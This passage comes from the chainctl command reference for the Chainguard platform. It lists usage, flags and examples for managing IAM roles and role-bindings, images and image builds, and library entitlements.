Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam - IAM related commands for the Chainguard platform. chainctl iam role-bindings create - Create a role-binding chainctl iam role-bindings delete - Delete a role-binding. chainctl iam role-bindings list - List role-bindings. chainctl iam role-bindings update - Update a role-binding. --- ### chainctl iam role-bindings create URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_role-bindings_create/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam role-bindings create Create a role-binding chainctl iam role-bindings create [--identity=IDENTITY] [--role=ROLE] [--parent ORGANIZATION_NAME | ORGANIZATION_ID | FOLDER_NAME | FOLDER_ID] [--output=id|json|table] Examples # Bind a user-created identity as viewer to a location chainctl iam role-bindings create --identity=guest-identity --role=viewer --parent=engineering # Create a new role-binding using interactive selection for identity, role, and location chainctl iam role-bindings create Options -h, --help help for create --identity string The name or ID of the identity to bind. --parent string The name or ID of the location the role-binding belongs to. --role string The name or ID of the role to bind to the identity. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam role-bindings - IAM role-bindings resource interactions. --- ### chainctl iam role-bindings delete URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_role-bindings_delete/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam role-bindings delete Delete a role-binding. chainctl iam role-bindings delete ROLE_BINDING_ID [--yes] [--output=id] Examples # Delete a role-binding chainctl iam role-bindings delete 9b6da6e64b45129eb4e9f9f3ce9b69ca2a550c6b/034e4afcda8c0b07/55b470f08e38b4d2 Options -h, --help help for delete -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam role-bindings - IAM role-bindings resource interactions. --- ### chainctl iam role-bindings list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_role-bindings_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam role-bindings list List role-bindings. chainctl iam role-bindings list [--parent ORGANIZATION_NAME | ORGANIZATION_ID | FOLDER_NAME | FOLDER_ID] [--output=json|table|tree] Examples # List role-bindings chainctl iam role-bindings list # Filter role-bindings by organization chainctl iam role-bindings list --parent=my-org Options -h, --help help for list --parent string List role-bindings from this location. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam role-bindings - IAM role-bindings resource interactions. --- ### chainctl iam role-bindings update URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_role-bindings_update/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam role-bindings update Update a role-binding. chainctl iam role-bindings update BINDING_ID [--role=ROLE] [--identity=IDENTITY] [--output=id|json|table] Examples # Update the role an identity is bound to chainctl iam role-bindings update fb694596eb1678321f94eec283e1e0be690f655c/a2973bac66ebfde3 --role=editor # Update the identity bound to a role chainctl iam role-bindings update fb694596eb1678321f94eec283e1e0be690f655c/a2973bac66ebfde3 --identity=support-identity Options -h, --help help for update --identity string The name or ID of the identity to bind. --role string The name or ID of the role to bind to the identity. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam role-bindings - IAM role-bindings resource interactions. --- ### chainctl iam roles URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_roles/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam roles IAM role resource interactions. Options -h, --help help for roles Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam - IAM related commands for the Chainguard platform. chainctl iam roles capabilities - IAM role capabilities chainctl iam roles create - Create an IAM role. chainctl iam roles delete - Delete a custom IAM role. chainctl iam roles list - List IAM roles. chainctl iam roles update - Update an IAM role. --- ### chainctl iam roles capabilities URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_roles_capabilities/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam roles capabilities IAM role capabilities Options -h, --help help for capabilities Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam roles - IAM role resource interactions. chainctl iam roles capabilities list - List IAM role capabilities. --- ### chainctl iam roles capabilities list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_roles_capabilities_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam roles capabilities list List IAM role capabilities. chainctl iam roles capabilities list [--actions=ACTION,...] [--resources=RESOURCE,...] [--output=json|table|tree] Examples # List all capabilities chainctl iam roles capabilities list # List all capabilities for groups and repos chainctl iam roles capabilities list --resources=groups,repos # List all capabilities that include list chainctl iam roles capabilities list --actions=list Options --actions strings Capability actions to list. -h, --help help for list --resources strings Capability resources to list. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam roles capabilities - IAM role capabilities --- ### chainctl iam roles create URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_roles_create/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam roles create Create an IAM role. chainctl iam roles create ROLE_NAME --parent ORGANIZATION_NAME | ORGANIZATION_ID | FOLDER_NAME | FOLDER_ID --capabilities=CAPABILITY,... [--description=DESCRIPTION] [--yes] [--output=id|json|table] Examples # Create a role chainctl iam roles create my-role --parent=engineering --capabilities=policy.list,groups.list # Create a role and choose parameters interactively chainctl iam roles create my-role Options --capabilities strings A comma separated list of capabilities to grant this role. --description string A description of the role. -h, --help help for create --parent string Location to create this role under. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam roles - IAM role resource interactions. --- ### chainctl iam roles delete URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_roles_delete/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam roles delete Delete a custom IAM role. chainctl iam roles delete ROLE_NAME|ROLE_ID [--yes] [--output=id|json|table] Examples # Delete a role by ID chainctl iam roles delete 3ed98fc... Options -h, --help help for delete -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam roles - IAM role resource interactions. --- ### chainctl iam roles list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_roles_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam roles list List IAM roles. chainctl iam roles list [--name=NAME] [--capabilities=CAPABILITY,...] [--parent=PARENT | --managed] [--output=id|json|table] Examples # List all accessible roles chainctl iam roles list # List all managed (built-in) roles chainctl iam roles list --managed # List all roles that can create groups chainctl iam roles list --capabilities=groups.create Options --capabilities strings A comma separated list of capabilities to grant this role. -h, --help help for list --managed Only list managed (built-in) roles. --name string The exact name of roles to list. --parent string Location to list roles from. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam roles - IAM role resource interactions. --- ### chainctl iam roles update URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_roles_update/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam roles update Update an IAM role. chainctl iam roles update ROLE_NAME|ROLE_ID [--capabilities=CAPABILITY,...] [--add-capabilities=CAPABILITY,...] [--remove-capabilities=CAPABILITY,...] [--description=DESCRIPTION] [--yes] [--output=id|json|table] Examples # Update a role with a complete set of capabilities chainctl iam roles update my-role --capabilities=policy.list,groups.list,identity.list # Add new capabilities to a role chainctl iam roles update my-role --add-capabilities=policy.create # Remove an existing capabilities from a role chainctl iam roles update my-role --remove-capabilities=identity.list # Interactively choose capabilities to add to a role chainctl iam roles update my-role --add-capabilities= Options --add-capabilities strings A comma separated list of capabilities to add to this role (can't be used with --capabilities). --capabilities strings A comma separated list of capabilities to grant this role. --description string A description of the role. -h, --help help for update --remove-capabilities strings A comma separated list of capabilities to remove from this role (can't be used with --capabilities). -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam roles - IAM role resource interactions. --- ### chainctl images URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images Images related commands for the Chainguard platform. Options -h, --help help for images Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl - Chainguard Control chainctl images diff - Diff images. chainctl images history - Show history for a specific image tag. chainctl images list - List tagged images from Chainguard registries. chainctl images repos - Image repo related commands for the Chainguard platform. --- ### chainctl images diff URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images_diff/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images diff Diff images. Synopsis Diffs 2 images together, based on their SBOM and Vulnerability scan. SBOM packages are diffed based on their PURL (https://github.com/package-url/purl-spec) and version. PURLs are grouped without their @version component. If identical PURLs are found, the first one found is used. If an SBOM package contains multiple PURLs, results will contain multiple entries for the same package name based on the purl type. Vulnerability scans are done via grype, which must be available on the system PATH. chainctl images diff FROM_IMAGE TO_IMAGE [flags] Options -t, --artifact-types strings Specifies the purl artifact types to diff. If "-" is provided, all types are included. (default [apk]) -h, --help help for diff --platform string Specifies the platform in the form os/arch (e.g. linux/amd64, linux/arm64) (default "linux/amd64") Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl images - Images related commands for the Chainguard platform. --- ### chainctl images history URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images_history/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images history Show history for a specific image tag. Synopsis Show history for a specific image tag. If a digest does not represent a multi-arch image, only a single digest without architecture information will be displayed. Architecture information may not be available for all digests. Examples: Show history for a specific tag (selected interactively) chainctl images history nginx Show history for a specific tag (specified in the command) chainctl images history nginx:1.21.0 Show history for a tag in a specific organization chainctl images history nginx:1.21.0 –parent=my-org chainctl images history IMAGE[:TAG] [flags] Options -h, --help help for history --parent string Organization to view image history from Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl images - Images related commands for the Chainguard platform. --- ### chainctl images list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images list List tagged images from Chainguard registries. chainctl images list [--repo=REPO_NAME] [--public | --parent=PARENT_NAME|PARENT_ID] [--updated-within=DURATION] [--show-dates] [--show-epochs] [--show-referrers] [--output=csv|id|json|table|terse|tree|wide] Options -h, --help help for list --parent string The name or id of the parent location to list image repos. --public List repos from the public Chainguard registry. --repo string Search for a specific repo by name. --show-dates Whether to show date tags of the form latest-{date}. --show-epochs Whether to show epoch tags of the form 1.2.3-r4. --show-referrers Whether to show referrer tags of the form sha256-deadbeef.{sig,sbom,att}. --updated-within duration The duration within which an image must have been updated (0 disables the filter). Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl images - Images related commands for the Chainguard platform. --- ### chainctl images repos URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images_repos/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images repos Image repo related commands for the Chainguard platform. Options -h, --help help for repos Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl images - Images related commands for the Chainguard platform. chainctl images repos build - Manage custom image builds chainctl images repos list - List image repositories. --- ### chainctl images repos build URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images_repos_build/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images repos build Manage custom image builds Options -h, --help help for build Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl images repos - Image repo related commands for the Chainguard platform. chainctl images repos build apply - Apply a build config chainctl images repos build edit - Edit a build config chainctl images repos build list - List build reports chainctl images repos build logs - Get build logs --- ### chainctl images repos build apply URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images_repos_build_apply/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images repos build apply Apply a build config chainctl images repos build apply [flags] Options -f, --file string The name of the file containing the build config. -h, --help help for apply --parent string The name or id of the parent location to apply build config. --repo string The name or id of the repo to apply build config. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl images repos build - Manage custom image builds --- ### chainctl images repos build edit URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images_repos_build_edit/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images repos build edit Edit a build config chainctl images repos build edit [flags] Options -h, --help help for edit --parent string The name or id of the parent location to apply build config. --repo string The name or id of the repo to apply build config. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl images repos build - Manage custom image builds --- ### chainctl images repos build list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images_repos_build_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images repos build list List build reports chainctl images repos build list [--parent ORGANIZATION_NAME | ORGANIZATION_ID | FOLDER_NAME | FOLDER_ID] [flags] Options -h, --help help for list --parent string The name or id of the parent location to list build reports. --repo string Search for a specific repo by name, or ID. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl images repos build - Manage custom image builds --- ### chainctl images repos build logs URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images_repos_build_logs/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images repos build logs Get build logs chainctl images repos build logs [flags] Options --build-id string The id of the build to get logs for. -h, --help help for logs --parent string The name or id of the parent location to get build logs. --repo string The name or id of the repo to get build logs. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl images repos build - Manage custom image builds --- ### chainctl images repos list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images_repos_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images repos list List image repositories. chainctl images repos list [--repo=REPO_NAME] [--public | --parent=PARENT_NAME|PARENT_ID] [--updated-within=DURATION] [--show-dates] [--show-epochs] [--show-referrers] Options -h, --help help for list --parent string The name or id of the parent location to list image repos. --public List repos from the public Chainguard registry. --repo string Search for a specific repo by name. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl images repos - Image repo related commands for the Chainguard platform. --- ### chainctl libraries URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_libraries/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl libraries Ecosystem library related commands. Options -h, --help help for libraries Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl - Chainguard Control chainctl libraries entitlements - Manage entitlements to language ecosystem libraries. --- ### chainctl libraries entitlements URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_libraries_entitlements/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl libraries entitlements Manage entitlements to language ecosystem libraries. Options -h, --help help for entitlements Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl libraries - Ecosystem library related commands. chainctl libraries entitlements list - List entitlements of an organization. --- ### chainctl libraries entitlements list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_libraries_entitlements_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl libraries entitlements list List entitlements of an organization. chainctl libraries entitlements list --parent=PARENT [--output=json|table] [flags] Options -h, --help help for list --parent string The name or id of the org to list an entitlements for. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl libraries entitlements - Manage entitlements to language ecosystem libraries. --- ### chainctl packages URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_packages/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl packages Interact with Chainguard packages Options -h, --help help for packages Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, 